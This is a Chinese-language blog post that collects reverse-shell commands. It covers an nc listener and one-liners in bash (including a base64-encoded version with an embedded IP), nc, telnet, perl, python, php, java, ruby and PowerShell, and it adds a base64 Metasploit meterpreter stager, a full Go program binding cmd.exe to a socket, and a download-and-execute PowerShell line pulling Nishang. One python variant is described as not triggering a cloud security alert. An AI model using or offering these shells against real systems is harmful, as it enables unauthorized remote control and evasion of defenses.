反弹shell方式收集


0x00 攻击机 nc 监听

nc -nvlp 443

-n: 不做 DNS 反向解析,即不把 ip 解析成域名 (no dns)
-v: 详细信息输出 verbose
-l: 监听 listen
-p: 指定端口 port

0x01 常用 Shell

1. Linux/Mac OS

查看全部 shell:cat /etc/shells

# sh
/bin/sh

# bash
/bin/bash
/usr/bin/bash

# rbash
/bin/rbash
/usr/bin/rbash

# dash
/bin/dash
/usr/bin/dash

# Other
/usr/bin/screen

2. Windows

cmd
powershell

# shell路径
C:/Windows/System32/cmd.exe
C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe

0x02 各种反弹方式

1. bash 反弹

bash -i >& /dev/tcp/AttackerIp/AttackerPort 0>&1

base64 版

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTUuMTU5LjQyLjI0LzgwIDA+JjE=}|{base64,-d}|{bash,-i}'

2. nc 反弹

nc -e /bin/sh AttackerIp AttackerPort

-e: 指定 nc 连接成功后执行的程序

3. telnet 反弹(nc 不可用或/dev/tcp 不可用时)

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

4. perl 反弹

perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

不依赖于 /bin/sh 的 shell:这条语句比上面的更为简短,而且确实不需要依赖 /bin/sh

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

5. python 反弹(云盾不报警)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

另外的形式:

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('attackerip',9000))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

另外 Metasploit 版的代码:

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=attackerip LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

6. php 反弹

php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

7. java 反弹

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

8. ruby 反弹

ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

不依赖于/bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

如果目标系统运行 Windows:

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

9. Golang 反弹

package main

import (
    "bytes"
    "net"
    "os"
    "os/exec"
)

func main() {
    // Open an outbound TCP connection to the hard-coded listener address.
    // On failure the program exits silently with status 1.
    conn, err := net.Dial("tcp", "attackerip:443")
    if err != nil {
        os.Exit(1)
    }

    // Switch the console code page to UTF-8 (65001) so Chinese text from cmd is
    // not garbled (original comment: 解决cmd中文乱码). The captured output is
    // never read and the Run() error is discarded.
    cn := exec.Command("cmd", "/C", "chcp 65001") // cmd/powershell
    var output bytes.Buffer
    cn.Stdout = &output
    cn.Run()

    // Start cmd with stdin, stdout and stderr all bound to the socket, so the
    // remote end drives the shell directly over the connection. The observable
    // pattern for defenders is a cmd.exe child of this binary whose standard
    // handles are a network socket. The Run() error is discarded here too.
    cmd := exec.Command("cmd") // cmd/powershell
    cmd.Stdin = conn
    cmd.Stdout = conn
    cmd.Stderr = conn
    cmd.Run()
}

10. powershell 反弹

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress attackerip -port 4444

11. 其它

exec 5<>/dev/tcp/attackerip/4444;cat <&5|while read line;do $line >&5 2>&1;done

文章作者: Truda
版权声明: 本博客所有文章除特别声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Truda !